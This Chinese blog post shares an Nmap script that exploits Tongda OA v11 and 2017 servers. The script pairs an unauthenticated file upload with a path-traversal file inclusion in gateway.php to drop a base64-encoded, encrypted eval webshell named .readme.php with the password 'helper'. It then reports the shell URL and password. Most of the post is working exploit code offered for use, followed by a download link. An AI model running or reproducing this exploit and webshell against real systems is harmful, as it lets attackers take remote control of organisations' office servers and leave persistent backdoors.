通达OA文件包含全版本 getshell | Nmap 脚本

时间:2022-07-23
本文章向大家介绍通达OA文件包含全版本 getshell | Nmap 脚本,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。

昨天写的脚本仅仅是针对 v11 版本,看到此次漏洞涉及版本较多,包括

  • v11
  • 2017
  • 2016
  • 2015
  • 2013 增强版
  • 2013

今天就做了全版本匹配,但是我发现似乎只有 v11 和 2017 版本存在文件包含漏洞,文件上传是都存在的,但不是web目录(webroot) 所以今天更新了一下 2017 版本的利用,顺便改了一下result的值和拼错了的 nothing 

local stdnse = require "stdnse"
local shortport = require "shortport"
local http = require "http"
local string = require "string"
local base64 = require "base64"

description = "TDOA v11.3 & v2017 | upload & lfi"
author = "test94"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"default", "vuln", "intrusive"}

---
-- @usage
-- nmap <target> -p80 -Pn --script tdoa --scan-delay 1000ms
--
-- @output
-- PORT     STATE SERVICE
-- 8080/tcp open  http-proxy
-- | tdoa:
-- |   result: vulnerable
-- |   webshell: 192.168.1.48:8080/ispirit/interface/.readme.php
-- |_  webshell_pass: helper

prerule = function()
    print("-----------------------------------")
    print("[+] TongdaOA upload & lfi Detecting ... ")
    print("[-] (if port is filtered, nothing will be checked)")
    print("")
end

portrule = shortport.service({"http", "https", "afs3-callback", "http-proxy"})

local postdatas = [[
------WebKitFormBoundary
Content-Disposition: form-data; name="UPLOAD_MODE"

1
------WebKitFormBoundary
Content-Disposition: form-data; name="P"

1
------WebKitFormBoundary
Content-Disposition: form-data; name="DEST_UID"

1
------WebKitFormBoundary
Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
Content-Type: image/jpeg

<?php
$fp = fopen('.readme.php', 'w');
$a = base64_decode("PD9waHAKQGVycm9yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFydCgpOwppZiAoaXNzZXQoJF9HRVRbJ2hlbHBlciddKSkKewogICAgJGtleT1zdWJzdHIobWQ1KHVuaXFpZChyYW5kKCkpKSwxNik7CiAgICAkX1NFU1NJT05bJ2snXT0ka2V5OwogICAgcHJpbnQgJGtleTsKfQplbHNlCnsKICAgICRrZXk9JF9TRVNTSU9OWydrJ107CgkkcG9zdD1maWxlX2dldF9jb250ZW50cygicGhwOi8vaW5wdXQiKTsKCWlmKCFleHRlbnNpb25fbG9hZGVkKCdvcGVuc3NsJykpCgl7CgkJJHQ9ImJhc2U2NF8iLiJkZWNvZGUiOwoJCSRwb3N0PSR0KCRwb3N0LiIiKTsKCQkKCQlmb3IoJGk9MDskaTxzdHJsZW4oJHBvc3QpOyRpKyspIHsKICAgIAkJCSAkcG9zdFskaV0gPSAkcG9zdFskaV1eJGtleVskaSsxJjE1XTsgCiAgICAJCQl9Cgl9CgllbHNlCgl7CgkJJHBvc3Q9b3BlbnNzbF9kZWNyeXB0KCRwb3N0LCAiQUVTMTI4IiwgJGtleSk7Cgl9CiAgICAkYXJyPWV4cGxvZGUoJ3wnLCRwb3N0KTsKICAgICRmdW5jPSRhcnJbMF07CiAgICAkcGFyYW1zPSRhcnJbMV07CgljbGFzcyBDe3B1YmxpYyBmdW5jdGlvbiBfX2NvbnN0cnVjdCgkcCkge2V2YWwoJHAuIiIpO319CglAbmV3IEMoJHBhcmFtcyk7Cn0KPz4=");
fwrite($fp, $a);
fclose($fp);
?>
------WebKitFormBoundary--
]]

action = function(host, port)
    local output = stdnse.output_table()
    output.result = "not vulnerable"
    local include_url = nil
    local webshell_url = nil
    local relative_webshell_url = nil
      
    local options = {header = {}, content={}}
    options["header"]["User-Agent"] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3100.0 Safari/537.36"
    options["header"]["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"
    options["header"]["Accept-Encoding"] = "gzip, deflate"
    options["header"]["Accept-Language"] = "en-US,en;q=0.5"
    options["header"]["Connection"] = "keep-alive"
    options["header"]["Upgrade-Insecure-Requests"] = 1
    options["header"]["Content-Type"] = "multipart/form-data; boundary=----WebKitFormBoundary"
    options["content"] = postdatas

    local input_shell_request = http.post(host, port, "/ispirit/im/upload.php", options)
    local file_include = string.match(input_shell_request.body, "@2003_(.-)%|") .. ".jpg"
    -- print(file_include)
    local include_url_2019 = '/ispirit/interface/gateway.php?json={"url":"//general/../../attach/im/2003/'..file_include..'"}'
    local include_url_2017 = '/mac/gateway.php?json={"url":"//general/../../attach/im/2003/'..file_include..'"}'
    -- local include_url_2016 = '/mac/gateway.php?json={"url":"//general/../../attach/weixunshare/2003/'..file_include..'"}'


    options["header"]["Content-Type"] = "multipart/form-data"
    options["content"] = nil
    -- check the version
    local check_requests = http.pipeline_add("/ispirit/interface/gateway.php", options, nil, "GET")
    check_requests = http.pipeline_add("/mac/gateway.php", options, check_requests, "GET")
    local check_response = http.pipeline_go(host, port, check_requests)
    
    if check_response[1]['status'] == 200 then
        include_url = include_url_2019
        webshell_url = host.ip .. ":" .. port.number .. "/ispirit/interface/.readme.php"
        relative_webshell_url = "/ispirit/interface/.readme.php"
    elseif check_response[2]['status'] == 200 then
        include_url = include_url_2017
        webshell_url = host.ip .. ":" .. port.number .. "/mac/.readme.php"
        relative_webshell_url = "/mac/.readme.php"
    end

    local all_requests = http.pipeline_add(include_url, options, nil, "GET")
    all_requests = http.pipeline_add(relative_webshell_url, options, all_requests, "GET")
    local all_response = http.pipeline_go(host, port, all_requests)
    -- output.respon = all_response
    if all_response[2]['status'] == 200 then
        output.result = "vulnerable"
        output.webshell = webshell_url
        output.webshell_pass = "helper"
    end
    return output
end

参考文章

https://github.com/jas502n/OA-tongda-RCE

脚本下载地址:

http://www.my-synology.cn:37980/sharing/TadkxqVi6

密码: helper

随机文章
本站知识点必读
最近更新